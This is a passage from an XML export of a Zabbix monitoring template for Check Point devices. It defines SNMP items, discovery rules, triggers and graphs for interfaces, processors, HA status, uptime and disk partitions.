                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Number of network interfaces</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>IF-MIB::ifNumber.0</snmp_oid>
                    <key>ifNumber</key>
                    <delay>3600</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>The number of network interfaces (regardless of their current state) present on this system.</description>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Interfaces</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Device contact details</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>SNMPv2-MIB::sysContact.0</snmp_oid>
                    <key>sysContact</key>
                    <delay>3600</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>1</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>The textual identification of the contact person for this managed node, together with information on how to contact this person.  If no contact information is known, the value is the zero-length string.</description>
                    <inventory_link>23</inventory_link>
                    <applications>
                        <application>
                            <name>General</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Device description</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>SNMPv2-MIB::sysDescr.0</snmp_oid>
                    <key>sysDescr</key>
                    <delay>3600</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>1</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>A textual description of the entity.  This value should include the full name and version identification of the system's hardware type, software operating-system, and networking software.</description>
                    <inventory_link>14</inventory_link>
                    <applications>
                        <application>
                            <name>General</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Device location</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>SNMPv2-MIB::sysLocation.0</snmp_oid>
                    <key>sysLocation</key>
                    <delay>3600</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>1</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>The physical location of this node (e.g., `telephone closet, 3rd floor').  If the location is unknown, the value is the zero-length string.</description>
                    <inventory_link>24</inventory_link>
                    <applications>
                        <application>
                            <name>General</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Device name</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>SNMPv2-MIB::sysName.0</snmp_oid>
                    <key>sysName</key>
                    <delay>3600</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>1</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>An administratively-assigned name for this managed node. By convention, this is the node's fully-qualified domain name.  If the name is unknown, the value is the zero-length string.</description>
                    <inventory_link>3</inventory_link>
                    <applications>
                        <application>
                            <name>General</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Device uptime</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>1</multiplier>
                    <snmp_oid>SNMPv2-MIB::sysUpTime.0</snmp_oid>
                    <key>sysUpTime</key>
                    <delay>60</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>uptime</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>0.01</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>The time since the network management portion of the system was last re-initialized.</description>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>General</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
            </items>
            <discovery_rules>
                <discovery_rule>
                    <name>HA Status</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <snmp_oid>CHECKPOINT-MIB::haProblemName</snmp_oid>
                    <key>haProblemName</key>
                    <delay>240</delay>
                    <status>0</status>
                    <allowed_hosts/>
                    <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                    <snmpv3_securitylevel>2</snmpv3_securitylevel>
                    <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                    <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <filter>:</filter>
                    <lifetime>30</lifetime>
                    <description/>
                    <item_prototypes>
                        <item_prototype>
                            <name>HA Problem Status [{#SNMPVALUE}]</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>CHECKPOINT-MIB::haProblemStatus.{#SNMPINDEX}</snmp_oid>
                            <key>haProblemStatus[{#SNMPVALUE}]</key>
                            <delay>120</delay>
                            <history>90</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>4</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                            <snmpv3_securitylevel>2</snmpv3_securitylevel>
                            <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                            <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description/>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Check Point General Stats</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                    </item_prototypes>
                    <trigger_prototypes>
                        <trigger_prototype>
                            <expression>{Template CheckPoint SNMP:haProblemStatus[{#SNMPVALUE}].str(OK)}=0</expression>
                            <name>HA Status [{#SNMPVALUE}]</name>
                            <url/>
                            <status>0</status>
                            <priority>3</priority>
                            <description/>
                            <type>0</type>
                        </trigger_prototype>
                    </trigger_prototypes>
                    <graph_prototypes/>
                </discovery_rule>
                <discovery_rule>
                    <name>Network interfaces</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <snmp_oid>IF-MIB::ifDescr</snmp_oid>
                    <key>ifDescr</key>
                    <delay>3600</delay>
                    <status>0</status>
                    <allowed_hosts/>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <filter>:</filter>
                    <lifetime>30</lifetime>
                    <description>You may also consider using IF-MIB::ifType or IF-MIB::ifAlias for discovery depending on your filtering needs.

{$SNMP_COMMUNITY} is a global macro.</description>
                    <item_prototypes>
                        <item_prototype>
                            <name>Admin status of interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifAdminStatus.{#SNMPINDEX}</snmp_oid>
                            <key>ifAdminStatus[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The desired state of the interface.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap>
                                <name>SNMP interface status (ifAdminStatus)</name>
                            </valuemap>
                        </item_prototype>
                        <item_prototype>
                            <name>Alias of interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifAlias.{#SNMPINDEX}</snmp_oid>
                            <key>ifAlias[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>1</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description/>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Description of interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifDescr.{#SNMPINDEX}</snmp_oid>
                            <key>ifDescr[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>1</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>A textual string containing information about the interface.  This string should include the name of the manufacturer, the product name and the version of the interface hardware/software.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Inbound errors on interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifInErrors.{#SNMPINDEX}</snmp_oid>
                            <key>ifInErrors[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>1</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>For packet-oriented interfaces, the number of inbound packets that contained errors preventing them from being deliverable to a higher-layer protocol.  For character-oriented or fixed-length interfaces, the number of inbound transmission units that contained errors preventing them from being deliverable to a higher-layer protocol.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Incoming traffic on interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>1</multiplier>
                            <snmp_oid>IF-MIB::ifInOctets.{#SNMPINDEX}</snmp_oid>
                            <key>ifInOctets[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>bps</units>
                            <delta>1</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>8</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The number of octets in valid MAC frames received on this interface, including the MAC header and FCS.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Operational status of interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifOperStatus.{#SNMPINDEX}</snmp_oid>
                            <key>ifOperStatus[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The current operational state of the interface.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap>
                                <name>SNMP interface status (ifOperStatus)</name>
                            </valuemap>
                        </item_prototype>
                        <item_prototype>
                            <name>Outbound errors on interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifOutErrors.{#SNMPINDEX}</snmp_oid>
                            <key>ifOutErrors[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>1</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>For packet-oriented interfaces, the number of outbound packets that could not be transmitted because of errors. For character-oriented or fixed-length interfaces, the number of outbound transmission units that could not be transmitted because of errors.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Outgoing traffic on interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>1</multiplier>
                            <snmp_oid>IF-MIB::ifOutOctets.{#SNMPINDEX}</snmp_oid>
                            <key>ifOutOctets[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>bps</units>
                            <delta>1</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>8</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The number of octets transmitted in MAC frames on this interface, including the MAC header and FCS.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                    </item_prototypes>
                    <trigger_prototypes>
                        <trigger_prototype>
                            <expression>{Template CheckPoint SNMP:ifOperStatus[{#SNMPVALUE}].diff(0)}=1</expression>
                            <name>Operational status was changed on {HOST.NAME} interface {#SNMPVALUE}</name>
                            <url/>
                            <status>0</status>
                            <priority>1</priority>
                            <description/>
                            <type>0</type>
                        </trigger_prototype>
                    </trigger_prototypes>
                    <graph_prototypes>
                        <graph_prototype>
                            <name>Traffic on interface {#SNMPVALUE}</name>
                            <width>900</width>
                            <height>200</height>
                            <yaxismin>0.0000</yaxismin>
                            <yaxismax>100.0000</yaxismax>
                            <show_work_period>1</show_work_period>
                            <show_triggers>1</show_triggers>
                            <type>0</type>
                            <show_legend>1</show_legend>
                            <show_3d>0</show_3d>
                            <percent_left>0.0000</percent_left>
                            <percent_right>0.0000</percent_right>
                            <ymin_type_1>0</ymin_type_1>
                            <ymax_type_1>0</ymax_type_1>
                            <ymin_item_1>0</ymin_item_1>
                            <ymax_item_1>0</ymax_item_1>
                            <graph_items>
                                <graph_item>
                                    <sortorder>0</sortorder>
                                    <drawtype>5</drawtype>
                                    <color>00AA00</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>ifInOctets[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                                <graph_item>
                                    <sortorder>1</sortorder>
                                    <drawtype>5</drawtype>
                                    <color>3333FF</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>ifOutOctets[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                            </graph_items>
                        </graph_prototype>
                    </graph_prototypes>
                </discovery_rule>
                <discovery_rule>
                    <name>Processor Discovery</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <snmp_oid>CHECKPOINT-MIB::multiProcIndex</snmp_oid>
                    <key>multiProc</key>
                    <delay>240</delay>
                    <status>0</status>
                    <allowed_hosts/>
                    <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                    <snmpv3_securitylevel>2</snmpv3_securitylevel>
                    <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                    <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <filter>:</filter>
                    <lifetime>30</lifetime>
                    <description/>
                    <item_prototypes>
                        <item_prototype>
                            <name>Processor [{#SNMPVALUE}] Idle Time</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>CHECKPOINT-MIB::multiProcIdleTime.{#SNMPINDEX}</snmp_oid>
                            <key>multiProcIdleTime[{#SNMPVALUE}]</key>
                            <delay>90</delay>
                            <history>90</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                            <snmpv3_securitylevel>2</snmpv3_securitylevel>
                            <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                            <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description/>
                            <inventory_link>0</inventory_link>
                            <applications/>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Processor [{#SNMPVALUE}] System Time</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>CHECKPOINT-MIB::multiProcSystemTime.{#SNMPINDEX}</snmp_oid>
                            <key>multiProcSystemTime[{#SNMPVALUE}]</key>
                            <delay>90</delay>
                            <history>90</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                            <snmpv3_securitylevel>2</snmpv3_securitylevel>
                            <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                            <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description/>
                            <inventory_link>0</inventory_link>
                            <applications/>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Processor [{#SNMPVALUE}] User Time</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>CHECKPOINT-MIB::multiProcUserTime.{#SNMPINDEX}</snmp_oid>
                            <key>multiProcUserTime[{#SNMPVALUE}]</key>
                            <delay>90</delay>
                            <history>90</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                            <snmpv3_securitylevel>2</snmpv3_securitylevel>
                            <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                            <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description/>
                            <inventory_link>0</inventory_link>
                            <applications/>
                            <valuemap/>
                        </item_prototype>
                    </item_prototypes>
                    <trigger_prototypes>
                        <trigger_prototype>
                            <expression>{Template CheckPoint SNMP:multiProcIdleTime[{#SNMPVALUE}].avg(300)}&lt;25</expression>
                            <name>{HOSTNAME} Processor usage high on CPU {#SNMPVALUE}</name>
                            <url/>
                            <status>0</status>
                            <priority>3</priority>
                            <description/>
                            <type>0</type>
                        </trigger_prototype>
                    </trigger_prototypes>
                    <graph_prototypes>
                        <graph_prototype>
                            <name>Processor usage CPU {#SNMPVALUE}</name>
                            <width>900</width>
                            <height>200</height>
                            <yaxismin>0.0000</yaxismin>
                            <yaxismax>100.0000</yaxismax>
                            <show_work_period>1</show_work_period>
                            <show_triggers>0</show_triggers>
                            <type>1</type>
                            <show_legend>1</show_legend>
                            <show_3d>0</show_3d>
                            <percent_left>0.0000</percent_left>
                            <percent_right>0.0000</percent_right>
                            <ymin_type_1>0</ymin_type_1>
                            <ymax_type_1>0</ymax_type_1>
                            <ymin_item_1>0</ymin_item_1>
                            <ymax_item_1>0</ymax_item_1>
                            <graph_items>
                                <graph_item>
                                    <sortorder>0</sortorder>
                                    <drawtype>1</drawtype>
                                    <color>CC0000</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>multiProcSystemTime[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                                <graph_item>
                                    <sortorder>1</sortorder>
                                    <drawtype>1</drawtype>
                                    <color>0000C8</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>multiProcUserTime[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                                <graph_item>
                                    <sortorder>2</sortorder>
                                    <drawtype>1</drawtype>
                                    <color>00C800</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>multiProcIdleTime[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                            </graph_items>
                        </graph_prototype>
                    </graph_prototypes>
                </discovery_rule>
                <discovery_rule>
                    <name>Disk partitions</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <snmp_oid>HOST-RESOURCES-MIB::hrStorageDescr</snmp_oid>
                    <key>hrStorageDescr</key>
                    <delay>3600</delay>
                    <status>0</status>
                    <allowed_hosts/>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <filter>{#SNMPVALUE}:@Storage devices for SNMP discovery</filter>
                    <lifetime>30</lifetime>
                    <description>The rule will discover all disk partitions matching the global regexp &quot;Storage devices for SNMP discovery&quot;.

{$SNMP_COMMUNITY} is a global macro.</description>
                    <item_prototypes>
                        <item_prototype>
                            <name>Allocation units for storage $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>HOST-RESOURCES-MIB::hrStorageAllocationUnits.{#SNMPINDEX}</snmp_oid>
                            <key>hrStorageAllocationUnits[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>B</units>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The size, in bytes, of the data objects allocated from this pool.  If this entry is monitoring sectors, blocks, buffers, or packets, for example, this number will commonly be greater than one.  Otherwise this number will typically be one.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Description of storage $1</name>
